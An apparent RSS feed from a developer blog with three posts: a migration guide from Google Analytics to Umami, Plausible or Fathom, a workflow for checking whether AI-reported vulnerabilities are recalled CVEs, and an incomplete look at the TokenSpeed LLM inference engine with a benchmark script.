<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Alan West | Dev Blog on Auth, AI Tools and Code]]></title><description><![CDATA[Practical articles on auth patterns, AI coding agents, and developer tools. Code and honest opinions.]]></description><link>https://alan-west.hashnode.dev</link><generator>RSS for Node</generator><lastBuildDate>Wed, 17 Jun 2026 12:41:27 GMT</lastBuildDate><atom:link href="https://alan-west.hashnode.dev/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Migrating Off Google Analytics: Umami vs Plausible vs Fathom]]></title><description><![CDATA[The wake-up call I didn't ask for
Last week the TanStack folks reported what appears to be a compromise affecting some of their NPM packages (the details are still being sorted out in issue #7383 — read it yourself before drawing conclusions). I won'...]]></description><link>https://alan-west.hashnode.dev/migrating-off-google-analytics-umami-vs-plausible-vs-fathom</link><guid isPermaLink="true">https://alan-west.hashnode.dev/migrating-off-google-analytics-umami-vs-plausible-vs-fathom</guid><category><![CDATA[analytics]]></category><category><![CDATA[Open Source]]></category><category><![CDATA[privacy]]></category><category><![CDATA[webdev]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Tue, 12 May 2026 03:18:44 GMT</pubDate><enclosure url="https://images.pexels.com/photos/13628541/pexels-photo-13628541.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-the-wake-up-call-i-didnt-ask-for">The wake-up call I didn't ask for</h2>
<p>Last week the TanStack folks reported what appears to be a compromise affecting some of their NPM packages (the details are still being sorted out in <a target="_blank" href="https://github.com/TanStack/router/issues/7383">issue #7383</a> — read it yourself before drawing conclusions). I won't rehash the postmortem here. What I want to talk about is the gut-punch feeling I had reading it.</p>
<p>I run <code>npm install</code> every day. I've barely thought about which third-party scripts are loading in production. And one of the worst offenders sitting in nearly every site I've ever shipped? Analytics.</p>
<p>So this post is about something I've been chewing on for months but finally moved on: ripping Google Analytics out of three side projects and picking a privacy-focused alternative. Specifically, I'll compare <a target="_blank" href="https://umami.is">Umami</a>, <a target="_blank" href="https://plausible.io">Plausible</a>, and <a target="_blank" href="https://usefathom.com">Fathom</a> — the three I actually evaluated — and walk through the migration steps that worked for me.</p>
<h2 id="heading-why-even-migrate">Why even migrate?</h2>
<p>A few honest reasons, none of them ideological:</p>
<ul>
<li><strong>Script weight.</strong> GA4's <code>gtag.js</code> is heavy. The privacy-focused tools are typically 1–2 KB.</li>
<li><strong>Cookie banners.</strong> No cookies = no consent banner in most jurisdictions. Fewer modals = fewer bounces.</li>
<li><strong>Vendor trust.</strong> After watching a supply chain story unfold in real time, having fewer third-party scripts feels less reckless.</li>
<li><strong>Self-hosting option.</strong> If I can run it on my own infra, I control the script.</li>
</ul>
<p>If you genuinely need Google's audience features (remarketing, conversion linking to Google Ads), this post probably isn't for you. Stay where you are.</p>
<h2 id="heading-the-contenders">The contenders</h2>
<h3 id="heading-plausible">Plausible</h3>
<p>Open source (AGPL), GDPR/CCPA compliant, cloud or self-hosted. The script is small — the docs claim under 1 KB. Written in Elixir. Cloud plans are subscription-based.</p>
<h3 id="heading-fathom">Fathom</h3>
<p>Privacy-focused, cloud-only since they pivoted from the original open source v1 ("Fathom Lite," archived) to a commercial closed-source product. I evaluated the commercial product.</p>
<h3 id="heading-umami">Umami</h3>
<p>Open source (MIT), self-hosted by default with a hosted cloud option on <code>umami.is</code>. Built on Next.js, runs on PostgreSQL or MySQL. Free if you host it yourself. Easy enough that I had it running in an evening.</p>
<h2 id="heading-side-by-side">Side-by-side</h2>
<p>I'll keep this honest — I ran all three on the same site for two weeks before deciding.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Feature</td><td>Plausible</td><td>Fathom</td><td>Umami</td></tr>
</thead>
<tbody>
<tr>
<td>Open source</td><td>Yes (AGPL)</td><td>No (closed)</td><td>Yes (MIT)</td></tr>
<tr>
<td>Self-host</td><td>Yes</td><td>No</td><td>Yes (primary path)</td></tr>
<tr>
<td>Cookies</td><td>No</td><td>No</td><td>No</td></tr>
<tr>
<td>GDPR</td><td>Yes</td><td>Yes</td><td>Yes</td></tr>
<tr>
<td>Cloud option</td><td>Paid</td><td>Paid</td><td>Free tier + paid</td></tr>
<tr>
<td>Script size</td><td>~1 KB</td><td>~2 KB</td><td>~2 KB</td></tr>
<tr>
<td>Funnels / goals</td><td>Yes</td><td>Yes</td><td>Yes (basic)</td></tr>
</tbody>
</table>
</div><p>The sizes above match what I observed in the network tab, but check each vendor's docs before quoting them anywhere serious.</p>
<h2 id="heading-what-the-snippets-look-like">What the snippets look like</h2>
<p>Replacing GA is mostly about swapping a script tag. Here's the before:</p>
<pre><code class="lang-html"><span class="hljs-comment">&lt;!-- Google Analytics (the thing we're leaving) --&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">async</span> <span class="hljs-attr">src</span>=<span class="hljs-string">"https://www.googletagmanager.com/gtag/js?id=G-XXXXXX"</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript">
  <span class="hljs-built_in">window</span>.dataLayer = <span class="hljs-built_in">window</span>.dataLayer || [];
  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">gtag</span>(<span class="hljs-params"></span>)</span>{dataLayer.push(<span class="hljs-built_in">arguments</span>);}
  gtag(<span class="hljs-string">'js'</span>, <span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span>());
  gtag(<span class="hljs-string">'config'</span>, <span class="hljs-string">'G-XXXXXX'</span>); <span class="hljs-comment">// sends pageview + sets cookies</span>
</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
</code></pre>
<p>And the replacements:</p>
<pre><code class="lang-html"><span class="hljs-comment">&lt;!-- Plausible (cloud) --&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">defer</span> <span class="hljs-attr">data-domain</span>=<span class="hljs-string">"example.com"</span>
        <span class="hljs-attr">src</span>=<span class="hljs-string">"https://plausible.io/js/script.js"</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>

<span class="hljs-comment">&lt;!-- Fathom --&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">src</span>=<span class="hljs-string">"https://cdn.usefathom.com/script.js"</span>
        <span class="hljs-attr">data-site</span>=<span class="hljs-string">"ABCDEFG"</span> <span class="hljs-attr">defer</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>

<span class="hljs-comment">&lt;!-- Umami (self-hosted) --&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">defer</span> <span class="hljs-attr">src</span>=<span class="hljs-string">"https://analytics.mydomain.com/script.js"</span>
        <span class="hljs-attr">data-website-id</span>=<span class="hljs-string">"your-website-id"</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
</code></pre>
<p>That's it. No <code>dataLayer</code>. No consent banner gate. The script loads once, sends a single beacon per pageview, and stops bothering you.</p>
<h2 id="heading-custom-events">Custom events</h2>
<p>The thing I almost forgot when migrating: GA's <code>gtag('event', ...)</code> calls. Here's how I rewrote them for Umami (the APIs are similar across the three, but each has its own conventions):</p>
<pre><code class="lang-js"><span class="hljs-comment">// Before (GA4)</span>
gtag(<span class="hljs-string">'event'</span>, <span class="hljs-string">'signup_completed'</span>, {
  <span class="hljs-attr">plan</span>: <span class="hljs-string">'pro'</span>,
  <span class="hljs-attr">source</span>: <span class="hljs-string">'pricing_page'</span>
});

<span class="hljs-comment">// After (Umami)</span>
<span class="hljs-comment">// `umami` is attached to window by the loader script</span>
<span class="hljs-built_in">window</span>.umami?.track(<span class="hljs-string">'signup_completed'</span>, {
  <span class="hljs-attr">plan</span>: <span class="hljs-string">'pro'</span>,
  <span class="hljs-attr">source</span>: <span class="hljs-string">'pricing_page'</span>
});
</code></pre>
<p>Plausible uses <code>window.plausible('signup_completed', { props: { plan: 'pro' } })</code>. Fathom uses <code>fathom.trackEvent('signup_completed')</code>. Don't do a global find-and-replace — the property conventions differ enough that you'll want to read each vendor's docs first.</p>
<h2 id="heading-self-hosting-umami-in-five-minutes">Self-hosting Umami in five minutes</h2>
<p>This is the part that sold me. Here's the <code>docker-compose.yml</code> running on the VPS for one of my side projects:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">services:</span>
  <span class="hljs-attr">umami:</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">ghcr.io/umami-software/umami:postgresql-latest</span>
    <span class="hljs-attr">ports:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">"3000:3000"</span>
    <span class="hljs-attr">environment:</span>
      <span class="hljs-attr">DATABASE_URL:</span> <span class="hljs-string">postgresql://umami:umami@db:5432/umami</span>
      <span class="hljs-attr">DATABASE_TYPE:</span> <span class="hljs-string">postgresql</span>
      <span class="hljs-attr">APP_SECRET:</span> <span class="hljs-string">change-me-to-a-real-secret</span> <span class="hljs-comment"># rotate this</span>
    <span class="hljs-attr">depends_on:</span>
      <span class="hljs-attr">db:</span>
        <span class="hljs-attr">condition:</span> <span class="hljs-string">service_healthy</span>

  <span class="hljs-attr">db:</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">postgres:15-alpine</span>
    <span class="hljs-attr">environment:</span>
      <span class="hljs-attr">POSTGRES_DB:</span> <span class="hljs-string">umami</span>
      <span class="hljs-attr">POSTGRES_USER:</span> <span class="hljs-string">umami</span>
      <span class="hljs-attr">POSTGRES_PASSWORD:</span> <span class="hljs-string">umami</span>
    <span class="hljs-attr">volumes:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">umami-db:/var/lib/postgresql/data</span>
    <span class="hljs-attr">healthcheck:</span>
      <span class="hljs-attr">test:</span> [<span class="hljs-string">"CMD-SHELL"</span>, <span class="hljs-string">"pg_isready -U umami"</span>]

<span class="hljs-attr">volumes:</span>
  <span class="hljs-attr">umami-db:</span>
</code></pre>
<p>Run it behind Caddy or Nginx, point a subdomain at it, drop the script tag into your site. You own the data. Nothing leaves your server. The dashboard is genuinely pleasant — the Next.js UI loads fast and shows the things I actually look at.</p>
<h2 id="heading-migration-steps-that-worked">Migration steps that worked</h2>
<p>No magic, just mechanical:</p>
<ol>
<li><strong>Inventory your GA calls.</strong> Grep your codebase for <code>gtag(</code>, <code>dataLayer</code>, and any analytics wrapper functions. Write them down.</li>
<li><strong>Pick your destination.</strong> Zero ongoing cost and own your data → self-hosted Umami. Don't want to run Postgres → Plausible Cloud. Want the most polished commercial dashboard → Fathom.</li>
<li><strong>Run them in parallel for a week.</strong> Drop the new script alongside GA. Compare daily pageview counts. You'll see drift — the privacy-focused tools usually report fewer visits because they don't fingerprint, and that's kind of the point.</li>
<li><strong>Rewrite custom events.</strong> Map each <code>gtag('event', ...)</code> to the new API. Wrap them in a helper so you can switch again later without grepping.</li>
<li><strong>Remove the GA script and the cookie banner.</strong> This is the satisfying part.</li>
</ol>
<h2 id="heading-my-recommendation">My recommendation</h2>
<p>Honestly? Here's how I'd choose:</p>
<ul>
<li><strong>Side projects, solo devs:</strong> Self-hosted Umami. Free, simple, MIT-licensed.</li>
<li><strong>Small business, no ops appetite:</strong> Plausible Cloud. Easiest onboarding, still open source if you ever want to migrate off.</li>
<li><strong>Polished dashboards for clients:</strong> Fathom. The UX feels the most "finished" of the three.</li>
</ul>
<p>I'm not saying Google Analytics is bad — it's free, it's powerful, and it's still the right answer if you live inside their ad ecosystem. But for the rest of us, three lines of script and a Postgres container will get you 90% of what you actually look at, with one less third-party domain in your <code>Content-Security-Policy</code>.</p>
<p>The TanStack situation reminded me that every script tag is a trust decision. Make fewer trust decisions.</p>
]]></content:encoded></item><item><title><![CDATA[How to verify AI-discovered vulnerabilities aren't just training data echoes]]></title><description><![CDATA[The setup
Last month a friend DM'd me a screenshot. An AI security agent had "discovered" a vulnerability in a popular open-source project. The agent walked through exploitation steps, suggested a patch, the whole nine yards. Looked legit.
Then someo...]]></description><link>https://alan-west.hashnode.dev/how-to-verify-ai-discovered-vulnerabilities-arent-just-training-data-echoes</link><guid isPermaLink="true">https://alan-west.hashnode.dev/how-to-verify-ai-discovered-vulnerabilities-arent-just-training-data-echoes</guid><category><![CDATA[AI]]></category><category><![CDATA[Devops]]></category><category><![CDATA[llm]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Tue, 12 May 2026 01:21:30 GMT</pubDate><enclosure url="https://images.pexels.com/photos/17483874/pexels-photo-17483874.png?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-the-setup">The setup</h2>
<p>Last month a friend DM'd me a screenshot. An AI security agent had "discovered" a vulnerability in a popular open-source project. The agent walked through exploitation steps, suggested a patch, the whole nine yards. Looked legit.</p>
<p>Then someone pointed out the CVE ID it kept almost-quoting was from years earlier.</p>
<p>This is going to keep happening. As we wire LLMs into vulnerability research workflows, we run into a problem that doesn't have a clean analogue in traditional static analysis: <strong>the tool you're using may have already seen the answer in its training data, and it cannot reliably tell you which findings came from reasoning and which came from memory.</strong></p>
<p>I've spent the last few months adding AI-assisted triage to a security workflow at a contracting gig. Here's what I've learned about not getting fooled.</p>
<h2 id="heading-why-this-happens-the-root-cause">Why this happens (the root cause)</h2>
<p>LLMs train on whatever crawlable text is on the open internet. That includes:</p>
<ul>
<li>The full <a target="_blank" href="https://nvd.nist.gov/">NVD database</a></li>
<li><a target="_blank" href="https://github.com/advisories">GitHub Security Advisories</a></li>
<li>CVE writeups on blogs</li>
<li>Bug bounty disclosures (after the embargo lifts)</li>
<li>Mailing list archives (oss-security, full-disclosure, etc.)</li>
<li>Project changelogs and commit messages</li>
</ul>
<p>If a CVE was disclosed before a model's training cutoff, the model has very likely seen a description of the bug, the patch, and probably someone's analysis of it. When you point that same model at the vulnerable file, it isn't always <em>finding</em> the bug — sometimes it's <em>recognizing</em> it.</p>
<p>The tricky part: the model usually can't tell you which is which. It generates the same confident output either way. There's no internal flag for "I retrieved this from memory" versus "I derived this from the code in front of me."</p>
<p>This is the same phenomenon that makes LLMs unreliable for leaked benchmark questions — if the benchmark made it into training, the model "solves" it by recall. The security version just has higher stakes.</p>
<h2 id="heading-the-validation-workflow">The validation workflow</h2>
<p>Here's the rough process I run on any AI-flagged finding before it gets escalated. None of this is exotic — it's stuff I wish I'd been doing from day one.</p>
<h3 id="heading-step-1-check-the-public-databases-first">Step 1: Check the public databases first</h3>
<p>Before you trust <em>any</em> finding, fuzzy-match the bug fingerprint against known CVEs. The NVD publishes <a target="_blank" href="https://nvd.nist.gov/vuln/data-feeds">JSON data feeds</a> you can pull locally:</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> json
<span class="hljs-keyword">from</span> difflib <span class="hljs-keyword">import</span> SequenceMatcher
<span class="hljs-keyword">from</span> pathlib <span class="hljs-keyword">import</span> Path

<span class="hljs-comment"># NVD yearly feeds: https://nvd.nist.gov/vuln/data-feeds</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">load_nvd_feed</span>(<span class="hljs-params">year: int</span>) -&gt; list[dict]:</span>
    path = Path(<span class="hljs-string">f"nvdcve-1.1-<span class="hljs-subst">{year}</span>.json"</span>)
    <span class="hljs-keyword">return</span> json.loads(path.read_text())[<span class="hljs-string">"CVE_Items"</span>]

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">similarity</span>(<span class="hljs-params">a: str, b: str</span>) -&gt; float:</span>
    <span class="hljs-keyword">return</span> SequenceMatcher(<span class="hljs-literal">None</span>, a.lower(), b.lower()).ratio()

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">find_matches</span>(<span class="hljs-params">ai_description: str, package: str, threshold: float = <span class="hljs-number">0.55</span></span>):</span>
    matches = []
    <span class="hljs-keyword">for</span> year <span class="hljs-keyword">in</span> range(<span class="hljs-number">2010</span>, <span class="hljs-number">2027</span>):
        <span class="hljs-keyword">for</span> item <span class="hljs-keyword">in</span> load_nvd_feed(year):
            desc = item[<span class="hljs-string">"cve"</span>][<span class="hljs-string">"description"</span>][<span class="hljs-string">"description_data"</span>][<span class="hljs-number">0</span>][<span class="hljs-string">"value"</span>]
            <span class="hljs-comment"># Cheap pre-filter: only compare CVEs that mention the package</span>
            <span class="hljs-keyword">if</span> package.lower() <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> desc.lower():
                <span class="hljs-keyword">continue</span>
            score = similarity(ai_description, desc)
            <span class="hljs-keyword">if</span> score &gt;= threshold:
                matches.append((score, item[<span class="hljs-string">"cve"</span>][<span class="hljs-string">"CVE_data_meta"</span>][<span class="hljs-string">"ID"</span>], desc))
    <span class="hljs-keyword">return</span> sorted(matches, reverse=<span class="hljs-literal">True</span>)

hits = find_matches(ai_finding, package=<span class="hljs-string">"openssl"</span>)
<span class="hljs-keyword">for</span> score, cve_id, desc <span class="hljs-keyword">in</span> hits[:<span class="hljs-number">5</span>]:
    print(<span class="hljs-string">f"<span class="hljs-subst">{score:<span class="hljs-number">.2</span>f}</span>  <span class="hljs-subst">{cve_id}</span>: <span class="hljs-subst">{desc[:<span class="hljs-number">120</span>]}</span>..."</span>)
</code></pre>
<p>If you get a hit above ~0.6 similarity, your "discovery" is almost certainly a memorized CVE. <code>SequenceMatcher</code> is dumb but it catches the obvious cases. For better recall use sentence embeddings (the <code>sentence-transformers</code> library works fine) but start with the dumb thing — it's faster to debug.</p>
<h3 id="heading-step-2-check-the-timeline">Step 2: Check the timeline</h3>
<p>Git history doesn't lie. If the model says "this buffer overflow in <code>parse_packet</code>," run blame on the offending lines and check what the file looked like at different points in time:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># When was the suspect line introduced?</span>
git <span class="hljs-built_in">log</span> --all --follow -p -- path/to/file.c | head -200

<span class="hljs-comment"># Did a security fix already land near this code?</span>
git <span class="hljs-built_in">log</span> --all --<span class="hljs-built_in">source</span> --remotes --grep=<span class="hljs-string">"security\|CVE"</span> \
    -- path/to/file.c
</code></pre>
<p>If a fix landed for this exact code path years ago and the model is "discovering" it against modern source, you've already got your answer. Either the bug is fixed (and the model is recalling the pre-fix version), or there's a regression — which is worth knowing either way, but it's not a novel discovery.</p>
<h3 id="heading-step-3-force-the-model-to-reason-from-scratch">Step 3: Force the model to reason from scratch</h3>
<p>Here's a trick that's saved me a lot of time. Run the analysis again with the package name and obvious identifiers redacted. Replace function names with hashes:</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> re
<span class="hljs-keyword">import</span> hashlib

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">anonymize</span>(<span class="hljs-params">source: str, package: str</span>) -&gt; str:</span>
    <span class="hljs-comment"># Strip package name and CVE-ish identifiers the model could pattern-match on</span>
    source = re.sub(<span class="hljs-string">rf"\b<span class="hljs-subst">{package}</span>\b"</span>, <span class="hljs-string">"PACKAGE_X"</span>, source, flags=re.I)
    source = re.sub(<span class="hljs-string">r"CVE-\d{4}-\d+"</span>, <span class="hljs-string">"CVE-REDACTED"</span>, source)

    <span class="hljs-comment"># Hash long identifiers so memorized function names don't trigger recall</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">hash_ident</span>(<span class="hljs-params">m: re.Match</span>) -&gt; str:</span>
        <span class="hljs-keyword">return</span> <span class="hljs-string">"fn_"</span> + hashlib.sha256(m.group(<span class="hljs-number">0</span>).encode()).hexdigest()[:<span class="hljs-number">8</span>]

    <span class="hljs-keyword">return</span> re.sub(<span class="hljs-string">r"\b[a-z_][a-z0-9_]{6,}\b"</span>, hash_ident, source)
</code></pre>
<p>If the model still flags the same vulnerability class on the anonymized code, the finding is probably grounded in the code in front of it. If it suddenly can't find anything, you were getting recall.</p>
<p>This isn't bulletproof — distinctive code structure can still trigger memory — but it filters out a lot of noise. I haven't tested this thoroughly against every model family, so calibrate your threshold against findings you already know the answer to.</p>
<h2 id="heading-prevention-building-this-into-your-workflow">Prevention: building this into your workflow</h2>
<p>A few habits that have stuck:</p>
<ul>
<li><strong>Treat AI findings as leads, not conclusions.</strong> Same as a static analyzer warning. You wouldn't ship a fix for a <code>gosec</code> G104 without reading the code; don't ship one for an LLM finding either.</li>
<li><strong>Note the model's training cutoff in the report.</strong> Any CVE disclosed before that date is suspect by default.</li>
<li><strong>Cross-check against multiple sources.</strong> NVD, GitHub Advisory DB, the project's own security page (for FreeBSD that's <a target="_blank" href="https://www.freebsd.org/security/">freebsd.org/security</a>).</li>
<li><strong>Require a working PoC before triaging as P1.</strong> If the model can't produce a reproducer that actually runs against the current code, the finding is theoretical at best.</li>
<li><strong>Log the prompt and full output.</strong> When you eventually find out a "discovery" was a memory hit, you want to know what the prompt looked like so you can adjust.</li>
</ul>
<h2 id="heading-the-uncomfortable-truth">The uncomfortable truth</h2>
<p>Even when an AI tool <em>does</em> genuinely identify a real bug, you usually can't tell from the output alone whether it reasoned its way there or got lucky with memorization. That isn't a bug in any specific tool — it's a property of how these models work. The validation step isn't optional and it isn't going away.</p>
<p>The good news is that the validation is straightforward. The bad news is that I keep meeting teams who skip it because the AI sounded confident.</p>
<p>Don't skip it.</p>
]]></content:encoded></item><item><title><![CDATA[TokenSpeed and the Quiet Race to Make LLM Inference Boring]]></title><description><![CDATA[Another inference engine?
So TokenSpeed is trending on GitHub this week, billing itself as a "speed-of-light LLM inference engine." I clicked through expecting either a vLLM clone or another Rust rewrite of llama.cpp. I haven't run it in production y...]]></description><link>https://alan-west.hashnode.dev/tokenspeed-and-the-quiet-race-to-make-llm-inference-boring</link><guid isPermaLink="true">https://alan-west.hashnode.dev/tokenspeed-and-the-quiet-race-to-make-llm-inference-boring</guid><category><![CDATA[Devops]]></category><category><![CDATA[llm]]></category><category><![CDATA[MachineLearning]]></category><category><![CDATA[performance]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Mon, 11 May 2026 16:56:57 GMT</pubDate><enclosure url="https://images.pexels.com/photos/37052613/pexels-photo-37052613.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-another-inference-engine">Another inference engine?</h2>
<p>So TokenSpeed is trending on GitHub this week, billing itself as a "speed-of-light LLM inference engine." I clicked through expecting either a vLLM clone or another Rust rewrite of llama.cpp. I haven't run it in production yet — the repo is fresh and I want to be honest about that up front — but the framing alone is worth talking about, because it points at a shift I've been watching for a while.</p>
<p>The last two years of inference work have been a sprint. PagedAttention landed in vLLM. Continuous batching went from research paper to default behavior. FlashAttention-2 and -3 showed up everywhere. We've gone from "can you even serve a 13B model" to "can you saturate your H100s." TokenSpeed is part of a wave that's stopped trying to invent new tricks and started trying to make the existing ones cheap, predictable, and operable.</p>
<p>That's a less exciting story than "we made inference 10x faster," but it's the one that actually matters if you're shipping.</p>
<h2 id="heading-what-speed-of-light-really-means">What "speed of light" really means</h2>
<p>The phrase gets tossed around loosely, so let me be precise. In inference, the speed-of-light bound for decoding is roughly:</p>
<pre><code>tokens/sec ≤ memory_bandwidth / model_weights_size
</code></pre><p>For a 7B model in fp16 (~14GB of weights) on an H100 with ~3TB/s HBM bandwidth, the theoretical ceiling is around 200 tokens/sec for a single sequence. Real engines get somewhere between 30% and 80% of that depending on what tricks they pull. "Speed of light" inference means you're memory-bound, not compute-bound, and you're squeezing every last bit out of that bandwidth.</p>
<p>I'm not going to claim TokenSpeed actually hits this — I haven't benchmarked it, and I'd be skeptical of anyone who makes that claim without showing a reproducible harness. But the goal is the right goal. If you want to evaluate an inference engine, this is the math you should bring with you.</p>
<h2 id="heading-a-practical-benchmark-you-can-actually-run">A practical benchmark you can actually run</h2>
<p>When I'm comparing inference engines for a project, I don't trust marketing graphs. I run something boring like this against each candidate:</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> time
<span class="hljs-keyword">import</span> requests
<span class="hljs-keyword">import</span> statistics

<span class="hljs-comment"># Hit a local OpenAI-compatible endpoint exposed by your engine</span>
ENDPOINT = <span class="hljs-string">"http://localhost:8000/v1/chat/completions"</span>

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">measure_ttft_and_tps</span>(<span class="hljs-params">prompt, max_tokens=<span class="hljs-number">256</span></span>):</span>
    start = time.perf_counter()
    first_token_time = <span class="hljs-literal">None</span>
    token_count = <span class="hljs-number">0</span>

    <span class="hljs-comment"># streaming so we can capture time-to-first-token accurately</span>
    <span class="hljs-keyword">with</span> requests.post(ENDPOINT, json={
        <span class="hljs-string">"model"</span>: <span class="hljs-string">"local"</span>,
        <span class="hljs-string">"messages"</span>: [{<span class="hljs-string">"role"</span>: <span class="hljs-string">"user"</span>, <span class="hljs-string">"content"</span>: prompt}],
        <span class="hljs-string">"max_tokens"</span>: max_tokens,
        <span class="hljs-string">"stream"</span>: <span class="hljs-literal">True</span>,
    }, stream=<span class="hljs-literal">True</span>) <span class="hljs-keyword">as</span> r:
        <span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> r.iter_lines():
            <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> line <span class="hljs-keyword">or</span> <span class="hljs-keyword">not</span> line.startswith(<span class="hljs-string">b"data: "</span>):
                <span class="hljs-keyword">continue</span>
            <span class="hljs-keyword">if</span> first_token_time <span class="hljs-keyword">is</span> <span class="hljs-literal">None</span>:
                first_token_time = time.perf_counter()
            token_count += <span class="hljs-number">1</span>

    end = time.perf_counter()
    ttft = first_token_time - start
    <span class="hljs-comment"># decode rate excludes prefill, which is the number that matters for UX</span>
    tps = (token_count - <span class="hljs-number">1</span>) / (end - first_token_time)
    <span class="hljs-keyword">return</span> ttft, tps

prompts = [<span class="hljs-string">"Explain quicksort."</span>] * <span class="hljs-number">20</span>
results = [measure_ttft_and_tps(p) <span class="hljs-keyword">for</span> p <span class="hljs-keyword">in</span> prompts]
ttfts, tpss = zip(*results)

print(<span class="hljs-string">f"TTFT p50: <span class="hljs-subst">{statistics.median(ttfts)*<span class="hljs-number">1000</span>:<span class="hljs-number">.0</span>f}</span>ms"</span>)
print(<span class="hljs-string">f"TTFT p95: <span class="hljs-subst">{sorted(ttfts)[int(len(ttfts)*<span class="hljs-number">0.95</span>)]*<span class="hljs-number">1000</span>:<span class="hljs-number">.0</span>f}</span>ms"</span>)
print(<span class="hljs-string">f"Decode tokens/sec p50: <span class="hljs-subst">{statistics.median(tpss):<span class="hljs-number">.1</span>f}</span>"</span>)
</code></pre>
<p>Two numbers matter: time-to-first-token (TTFT) and steady-state decode rate. TTFT is dominated by prefill and request queueing — it's what your user feels when they hit submit. Decode rate is what determines whether your bill is sustainable.</p>
<p>I ran into a situation last year where an engine looked great on average throughput but had a TTFT p95 that was 4x worse than a "slower" alternative. Under load, the second engine felt faster to users even though it generated fewer tokens per second per request. Aggregate throughput is the wrong metric if you only ever look at the mean.</p>
<h2 id="heading-where-tokenspeed-fits-tentatively">Where TokenSpeed fits (tentatively)</h2>
<p>Looking at the repo, TokenSpeed appears to be aiming at the same niche as vLLM, TGI, SGLang, and TensorRT-LLM — high-throughput batched serving with an OpenAI-compatible API surface. According to the README it leans on the standard playbook: paged KV cache, continuous batching, and some form of speculative decoding. I want to stress that I'm describing what the changelog mentions, not what I've personally verified.</p>
<p>My honest take on this category:</p>
<ul>
<li><strong>vLLM</strong> is the default. Big community, fast-moving, supports almost every model that matters. It's what I reach for unless I have a specific reason not to.</li>
<li><strong>TGI</strong> is fine if you're already in the Hugging Face ecosystem.</li>
<li><strong>SGLang</strong> is genuinely interesting for structured generation and complex prompting patterns.</li>
<li><strong>TensorRT-LLM</strong> wins on raw H100/H200 throughput if you can stomach the build complexity.</li>
<li><strong>llama.cpp</strong> is still the right answer for CPU, Apple Silicon, and edge deployments.</li>
</ul>
<p>A new entrant has to do something specific better, or it's just another README. I'll be watching to see what TokenSpeed's specific edge actually is once people run real benchmarks. The trending chart isn't a benchmark.</p>
<h2 id="heading-the-operational-stuff-nobody-talks-about">The operational stuff nobody talks about</h2>
<p>The thing I've learned the hard way: inference engine choice matters less than how you operate the thing. A few patterns that have saved me real money:</p>
<ul>
<li><strong>Pin your model versions in the deployment manifest, not in code.</strong> Roll forward via deployment, not via app release.</li>
<li><strong>Separate prefill-heavy and decode-heavy traffic onto different replicas if you can.</strong> Long-context summarization and chat have very different shapes; mixing them in one pool hurts both.</li>
<li><strong>Cap <code>max_tokens</code> aggressively at the gateway.</strong> A single runaway request can starve a whole replica's KV cache budget.</li>
</ul>
<p>For observability, you want request-level metrics (TTFT, decode TPS, queue depth, cache utilization) flowing somewhere you can actually query. I usually pipe inference metrics to Prometheus and frontend analytics through something privacy-respecting. Privacy-focused options like Umami or Plausible give you full data ownership without dragging your users through GDPR consent gymnastics, which matters a lot for the LLM tools I've shipped to European clients.</p>
<h2 id="heading-should-you-switch">Should you switch?</h2>
<p>Probably not yet. If you're already running vLLM in production and it's meeting your SLOs, the cost of swapping is real: new failure modes, new tuning knobs, new metrics dashboards. The cost of staying is just continuing to pay attention.</p>
<p>What I'd actually do with TokenSpeed today:</p>
<ol>
<li>Clone it on a dev box.</li>
<li>Run the benchmark above against your real workload mix (not the README's prompt set).</li>
